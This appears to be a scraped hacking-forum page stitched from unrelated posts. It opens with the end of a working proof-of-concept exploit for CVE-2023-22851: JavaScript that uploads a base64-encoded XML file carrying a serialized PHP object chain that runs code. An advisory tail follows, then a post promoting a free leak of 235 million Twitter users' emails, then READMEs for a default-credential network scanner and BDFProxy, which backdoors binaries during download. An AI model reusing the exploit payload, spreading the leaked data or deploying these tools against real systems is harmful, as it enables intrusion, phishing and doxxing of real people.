   const xmlContent = atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAwZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");
   const fileInput = document.getElementById("fileinput");
   const dataTransfer = new DataTransfer();
   const file = new File([xmlContent], "test.xml", {type: "text/xml"});
   dataTransfer.items.add(file);
   fileInput.files = dataTransfer.files;
   document.forms[0].submit();
</script>
</html>

[-] Solution: Upgrade to version 24.2 or later.
[-] Disclosure Timeline:
[07/03/2022] - Vendor notified
[23/08/2022] - Version 24.1 released
[09/01/2023] - Public disclosure

[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2023-22851 to this vulnerability.

[-] Credits:
Vulnerability discovered by Egidio Romano.

[-] Original Advisory:
http://karmainsecurity.com/KIS-2023-04

Source
    1 point
  40. If you don't need an accountant, you surely need a dentist or a stockbroker. I confidently recommend @Checu.
    1 point
  41. Twitter database leaks for free with 235,000,000 records. The database contains 235,000,000 unique records of Twitter users and their email addresses and will unfortunately lead to a lot of hacking, targeted phishing, and doxxing. This is one of the most significant leaks ever. BF: https://breached.vc/Thread-Twitter-DB-Scrape-Leak-200-Mill-Lines?highlight=twitter
    1 point
  42. Research the company and the other companies belonging to the same group, plus Google (e.g. inurl).
    1 point
  43. Prowler

Prowler is a Network Vulnerability Scanner implemented on a Raspberry Pi Cluster, first developed during the Singapore Infosec Community Hackathon - HackSmith v1.0.

Capabilities
- Scan a network (a particular subnet or a list of IP addresses) for all IP addresses associated with active network devices
- Determine the type of devices using fingerprinting
- Determine if there are any open ports on the device
- Associate the ports with common services
- Test devices against a dictionary of factory default and common credentials
- Notify users of security vulnerabilities through a dashboard (Dashboard tour)

Planned capabilities
- Greater variety of vulnerability assessment capabilities (webapp etc.)
- Select wordlist based on fingerprint

Hardware
- Raspberry Pi Cluster HAT (with 4 * Pi Zero W)
- Raspberry Pi 3
- Networking device

Software Stack
- Raspbian Stretch (Controller Pi)
- Raspbian Stretch Lite (Worker Pi Zero)
- Note: For ease of setup, use the images provided by Cluster Hat!
- Python 3 (not tested on Python 2)
- Python packages: see requirements.txt
- Ansible for managing the cluster as a whole (/playbooks)

Key Python Packages
- dispy (website) is the star of the show. It allows us to create a job queue that will be processed by the worker nodes.
- python-libnmap is the Python wrapper around nmap, an open source network scanner. It allows us to scan for open ports on devices.
- paramiko is a Python wrapper around SSH. We use it to probe SSH on devices to test for common credentials.
- eel is used for the web dashboard (separate repository, here)
- rabbitmq (website) is used to pass the results from the cluster to the eel server that is serving the dashboard page.

Ansible Playbooks
For the playbooks to work, ansible must be installed (sudo pip3 install ansible). Configure the IP addresses of the nodes at /etc/ansible/hosts. WARNING: Your mileage may vary as these were only tested on my setup.
- shutdown.yml and reboot.yml: self-explanatory
- clone_repos.yml: clones the prowler and dispy repositories (required!) on the worker nodes
- setup_node.yml: installs all required packages on the worker nodes. Does not clone the repositories!

Deploying Prowler
1. Clone the git repository: git clone https://github.com/tlkh/prowler.git
2. Install dependencies by running sudo pip3 install -r requirements.txt on the controller Pi
3. Run ansible-playbook playbooks/setup_node.yml to install the required packages on the worker nodes.
4. Clone the prowler and dispy repositories to the worker nodes using ansible-playbook playbooks/clone_repos.yml
5. Run clusterhat on on the controller Pi to ensure that all Pi Zeros are powered up.
6. Run python3 cluster.py on the controller Pi to start Prowler

To edit the range of IP addresses being scanned, edit the following lines in cluster.py:

test_range = []
for i in range(0, 1):
    for j in range(100, 200):
        test_range.append("172.22." + str(i) + "." + str(j))
Old Demos
- Cluster Scan Demonstration Jupyter Notebook
- Single Scan Demonstration Jupyter Notebook
- Try out the web dashboard here

Useful Snippets
- To run an ssh command on multiple devices, install pssh and run: pssh -h pssh-hosts -l username -A -i "command"
- To create the cluster (in compute.py): cluster = dispy.JobCluster(compute, nodes='pi0_ip', ip_addr='pi3_ip')
- Check connectivity: ansible all -m ping or ping p1.local -c 1 && ping p2.local -c 1 && ping p3.local -c 1 && ping p4.local -c 1
- Temperature check: /opt/vc/bin/vcgencmd measure_temp && pssh -h workers -l pi -A -i "/opt/vc/bin/vcgencmd measure_temp" | grep temp
- rpimonitor (how to install):

Contributors
- Faith See
- Wong Chi Seng
- Timothy Liu

ABSOLUTELY NO WARRANTY WHATSOEVER! Feel free to submit issues though.

Download: prowler-master.zip
Source
    1 point
  44. The Backdoor Factory Proxy (BDFProxy) v0.2

For security professionals and researchers only. NOW ONLY WORKS WITH MITMPROXY >= v.0.11

To install on Kali:
apt-get update
apt-get install bdfproxy

DerbyCon 2014 Presentation: about 18 minutes in is the BDFProxy portion.

Contact the developer on:
IRC: irc.freenode.net #BDFactory
Twitter: @Midnite_runr

This script rides on two libraries for usage: The Backdoor Factory (BDF) and mitmProxy.

Concept: patch binaries during download, a la MITM.

Why: because a lot of security tool websites still serve binaries via non-SSL/TLS means. Here's a short list:
- sysinternals.com
- Microsoft - MS Security Essentials
- Almost all anti-virus companies
- Malwarebytes
- Sourceforge
- gpg4win
- Wireshark
- etc...

Yes, some of those apps are protected by self-checking mechanisms. I've been working on a way to automatically bypass NSIS checks as a proof of concept. However, that does not stop the initial issue of bit-flipping during download and the execution of a malicious payload. Also, BDF by default will patch out the Windows PE certificate table pointer during download, thereby removing the signature from the binary.

Depends:
- Pefile - most recent
- ConfigObj
- mitmProxy - Kali build 0.10
- BDF - most current
- Capstone (part of BDF)

Supported Environment: tested on all Kali Linux builds; whether on a physical beefy laptop, a Raspberry Pi, or a VM, each can run BDFProxy.

Install:
BDF is in bdf/. Run the following to pull down the most recent:
./install.sh
OR:
git clone https://github.com/secretsquirrel/the-backdoor-factory bdf/

If you get a certificate error, run the following:
mitmproxy
And exit [Ctrl+C] after mitmProxy loads.

Usage:
Update everything before each use:
./update.sh

READ THE CONFIG!!! --> bdfproxy.cfg
You will need to configure your C2 host and port settings before running BDFProxy. DO NOT overlap C2 PORT settings between different payloads: you'll be sending Linux shells to Windows machines and things will be segfaulting all over the place. After running, there will be a Metasploit resource script created to help with setting up your C2 communications. Check it carefully. By the way, everything outside the [Overall] section updates on the fly, so you don't have to kill your proxy to change settings to work with your environment.

But wait! You will need to configure your MITM machine for MITM-ing! If you are using a WiFi Pineapple, I modded a script put out by Hak5 to help you with configuration. Run ./wpBDF.sh and enter the correct configs for your environment. This script configures iptables to push only http (non-SSL) traffic through the proxy. All other traffic is forwarded normally.

Then:
./bdf_proxy.py

Here's some sweet ASCII art for possible physical setups of the proxy:

Lan usage:
<Internet>----<mitmMachine>----<userLan>

Wifi usage:
<Internet>----<mitmMachine>----<wifiPineapple>)))

Testing:
Suppose you want to test your setup using Firefox with FoxyProxy. Update your config as follows: transparentProxy = None. Configure FoxyProxy to use BDFProxy as a proxy. The default port in the config is 8080.

Logging:
We have it. The proxy window will quickly fill with massive amounts of cat links depending on the client you are testing. Use tail -f proxy.log to see what is getting patched and blocked by your blacklist settings.
However, keep an eye on the main proxy window if you have chosen to patch binaries manually; things move fast, and behind the scenes there is multi-threading of traffic, but the initial requests and responses are locking for your viewing pleasure.

Attack Scenarios (all with permission of targets):
- Evil WiFi AP
- ARP redirection
- Physical plant in a wiring closet
- Logical plant at your favorite ISP

Source: https://github.com/secretsquirrel/BDFProxy
    1 point